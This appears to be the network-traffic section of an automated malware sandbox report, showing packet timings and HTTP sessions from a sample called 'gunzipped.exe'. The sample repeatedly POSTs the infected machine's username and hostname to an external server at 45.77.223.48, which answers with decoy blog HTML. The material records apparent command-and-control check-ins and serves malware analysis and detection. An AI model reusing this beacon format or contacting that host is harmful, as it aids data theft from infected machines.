                                              Apr 26, 2024 04:57:31.087979078 CEST4975780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:31.088016033 CEST4975780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:31.141340971 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:31.328401089 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:31.328519106 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:31.331813097 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:31.519808054 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:31.520076036 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:31.707026005 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.388147116 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.388205051 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.388237953 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.388269901 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.388273001 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.388323069 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.396579981 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.396946907 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.396998882 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.397033930 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.397167921 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.397217035 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.397382975 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.397422075 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.397471905 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.575109005 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.575407028 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.575690031 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.581938028 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.582007885 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.582170963 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.595308065 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.595391989 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.595592976 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.609242916 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.609292984 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.609457016 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.622853994 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.622922897 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.623096943 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.636352062 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.636392117 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.636604071 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.649532080 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.649570942 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.649813890 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.664279938 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.664319992 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.664518118 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.675971985 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.676024914 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.676127911 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.689115047 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.689203978 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.689407110 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.763685942 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.763746023 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.763829947 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.770451069 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.770493984 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.770617962 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.783751011 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.783826113 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.783962965 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.796765089 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.796827078 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.796892881 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.809767008 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.809844017 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.809894085 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.823591948 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.823662043 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.823714018 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.836800098 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.836873055 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.836930037 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.849589109 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.849643946 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.849805117 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.862072945 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.862095118 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.862166882 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.873693943 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.873759985 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.873812914 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.884862900 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.884944916 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.884998083 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.895673990 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.895756960 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.895855904 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:32.906224966 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.906336069 CEST804975845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:32.906393051 CEST4975880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:38.434670925 CEST4975880192.168.2.445.77.223.48

                                              HTTP Request Dependency Graph

                                              • 45.77.223.48

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.44973745.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:08.113615990 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 176
                                              Connection: close
                                              Apr 26, 2024 04:57:08.300956964 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: 'ckav.rujones528110JONES-PCk0FDD42EE188E931437F4FBE2CeKal2
                                              Apr 26, 2024 04:57:09.199505091 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:08 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:09.199570894 CEST64INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
                                              Apr 26, 2024 04:57:09.199605942 CEST77INData Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:09.208127975 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:09.208436966 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:09.208544970 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:09.208736897 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:09.208884001 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:09.208923101 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:09.209387064 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.44973845.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:09.548217058 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 176
                                              Connection: close
                                              Apr 26, 2024 04:57:09.736443043 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: 'ckav.rujones528110JONES-PC+0FDD42EE188E931437F4FBE2Cjqtot
                                              Apr 26, 2024 04:57:10.612135887 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:09 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:10.612238884 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:10.612293005 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:10.621912956 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:10.622256994 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:10.622353077 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:10.622523069 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:10.622662067 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:10.622757912 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:10.622801065 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.44974145.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:10.856048107 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:11.042620897 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:11.914695024 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:10 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:11.914849997 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:11.915000916 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:11.923022032 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:11.923624039 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:11.924005985 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:11.924097061 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:11.924233913 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:11.924304962 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:11.924384117 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.44974245.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:12.236287117 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:12.423620939 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:16.293761015 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:12 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:16.293822050 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:16.293987036 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 26, 2024 04:57:16.294023037 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 26, 2024 04:57:16.294197083 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
